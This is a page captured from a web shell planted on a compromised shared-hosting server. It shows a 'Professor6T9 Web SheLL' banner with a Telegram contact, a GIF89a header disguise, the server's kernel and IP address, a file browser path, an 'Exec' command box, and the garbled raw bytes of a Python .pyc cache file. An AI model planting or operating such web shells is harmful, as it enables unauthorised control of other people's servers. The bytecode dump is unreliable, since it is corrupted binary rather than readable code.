GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux host69.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
68.65.123.79
/
opt
/
alt
/
python37
/
lib
/
python3.7
/
site-packages
/
future
/
backports
/
urllib
/
__pycache__
[ HOME ]
Exec
Submit
error.cpython-37.pyc
B �A�[� � @ sr d Z ddlmZmZmZ ddlmZ ddlmZ dddgZ G dd� de�ZG d d� dee j �ZG d d� de�ZdS )a� Exception classes raised by urllib. The base exception class is URLError, which inherits from IOError. It doesn't define any behavior of its own, but is the base class for all exceptions defined in this package. HTTPError is an exception class that is also a valid HTTP response instance. It behaves this way because HTTP protocol errors are valid responses, with a status code, headers, and a body. In some contexts, an application may want to handle an exception like a regular response. � )�absolute_import�division�unicode_literals)�standard_library)�response�URLError� HTTPError�ContentTooShortErrorc @ s e Zd Zddd�Zdd� ZdS )r Nc C s |f| _ || _|d k r|| _d S )N)�args�reason�filename)�selfr r � r �N/opt/alt/python37/lib/python3.7/site-packages/future/backports/urllib/error.py�__init__ s zURLError.__init__c C s d| j S )Nz<urlopen error %s>)r )r r r r �__str__&